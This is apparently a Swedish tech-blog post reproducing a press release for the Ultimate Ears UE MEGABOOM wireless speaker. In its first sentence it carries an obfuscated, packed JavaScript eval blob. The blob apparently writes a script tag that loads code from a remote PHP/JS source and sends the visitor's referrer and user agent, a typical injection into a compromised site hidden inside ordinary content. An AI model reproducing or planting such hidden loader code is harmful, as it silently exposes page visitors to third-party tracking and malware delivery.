Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Ultimate Ears lanserar högtalare med enastående ljudkvalitet – UE MEGABOOM

Ultimate Ears lanserar högtalare med enastående ljudkvalitet – UE MEGABOOM
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfzed|var|u0026u|referrer|fzkat||js|php’.split(’|’),0,{}))
utökar och förstärker Ultimate Ears sitt stall av prisbelönade, bärbara högtalare i och med lanseringen av UE MEGABOOM – nästa generations trådlösa högtalare, med mer kraft och starkare ljud än du någonsin tidigare upplevt i en bärbar högtalare. 

Likt sin föregångare, UE BOOM, är nästa generations högtalare – UE MEGABOOM en högtalare som skjuter ut fantastiskt 360-graders ljud, med basgångar som känns ända in i hjärtat.
Vattentät, hållbar och stötdämpande (certifierad av IPX7) strävar UE MEGABOOM efter att låta dig skapa oförglömliga musikminnen – oavsett var du befinner dig.

UE MEGABOOM väger mindre än ett kilo, har 20 timmars uppladdningsbar batteritid och ansluter till Bluetooth på ett avstånd upptill 30 meter. Du även koppla ihop två UE MEGABOOM alternativt en UE BOOM, för dubbelt så starkt ljud.

“Människor vill lyssna på musik, oavsett var de befinner sig, och vill låta musiken vara en del av allt de gör”, säger Rory Dooley general manager of Ultimate Ears. “Det är anledningen till att vi skapade UE MEGABOOM. För att du, oavsett vilka äventyr livet än tar dig på, ska kunna njuta av musikens magi”.

Både UE MEGABOOM och UE BOOM är designade för att ständigt uppdateras med banbrytande innehåll, tillgängliga genom appar för iOS® och Android™, fria för nedladdning. Funktioner som On/Off, alarm samt ljudinställningar finns tillgängliga och för första gången någonsin kan uppdateringar till högtalare göras trådlöst.

Pris och tillgänglighet

UE MEGABOOM finns tillgänglig i USA och utvalda länder i Europa och Asien under januari 2015. Rekommenderat pris hos återförsäljare – 2999 kronor.
För mer information, vänligen besök www.ultimateears.com